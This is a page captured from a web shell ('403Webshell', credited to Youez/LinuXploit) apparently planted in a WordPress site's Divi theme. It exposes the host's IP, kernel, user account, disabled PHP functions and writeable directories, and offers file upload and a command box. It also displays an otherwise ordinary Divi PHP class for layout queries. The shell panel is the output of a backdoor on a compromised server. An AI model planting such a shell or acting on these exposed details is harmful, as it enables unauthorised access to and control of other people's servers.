403Webshell
Server IP : 146.190.157.162  /  Your IP : 216.73.216.153
Web Server : Apache
System : Linux ubuntu-s-2vcpu-4gb-amd-sfo3-01-KIT-DIGITAL 6.5.0-44-generic #44-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 7 15:10:09 UTC 2024 x86_64
User : aragonviento ( 849)
PHP Version : 8.2.10-2ubuntu2.2
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_signal,pcntl_signal_dispatch,pcntl_getpriority,pcntl_setpriority,dl,putenv,parse_ini_file,show_source
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/aragonviento/wp-content/themes/Divi/includes/builder/post/query/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/aragonviento/wp-content/themes/Divi/includes/builder/post/query/Layouts.php
<?php


class ET_Builder_Post_Query_Layouts extends ET_Core_Post_Query {

	/**
	 * Whether or not to automatically exclude product tour layouts from the results.
	 *
	 * @since 3.0.99
	 * @var bool
	 */
	protected $_exclude_product_tour = true;

	/**
	 * @inheritDoc
	 */
	protected function _add_tax_query( $tax_name, $args, $negate = null ) {
		$args   = self::$_->array_flatten( $args );
		$negate = $this->_reset_negate();

		if ( ! $args ) {
			return $this;
		}

		parent::_add_tax_query( $tax_name, $args, $negate );

		return $this;
	}

	public function in_pack() {
		$args = func_get_args();

		return $this->with_tag( $args );
	}

	public function is_fullwidth() {
		$tax_name = ET_Builder_Post_Taxonomy_LayoutWidth::instance()->name;

		return $this->_add_tax_query( $tax_name, array( 'fullwidth' ) );
	}

	public function is_type() {
		$tax_name = ET_Builder_Post_Taxonomy_LayoutType::instance()->name;
		$args     = func_get_args();

		return $this->_add_tax_query( $tax_name, $args );
	}

	/**
	 * @inheritDoc
	 */
	public function run( $args = array() ) {
		$exclude_product_tour = apply_filters( 'et_builder_layout_query_exclude_product_tour', $this->_exclude_product_tour );

		if ( $exclude_product_tour ) {
			$this->not()->with_meta( '_et_pb_layout_applicability', 'product_tour' );
		}

		return parent::run( $args );
	}

	/**
	 * @inheritDoc
	 */
	public function with_meta( $key, $value = null ) {
		if ( '_et_pb_layout_applicability' === $key && 'product_tour' === $value ) {
			$this->_exclude_product_tour = false;
		}

		return parent::with_meta( $key, $value );
	}

	public function with_scope() {
		$tax_name = ET_Builder_Post_Taxonomy_LayoutScope::instance()->name;
		$args     = func_get_args();

		return $this->_add_tax_query( $tax_name, $args );
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit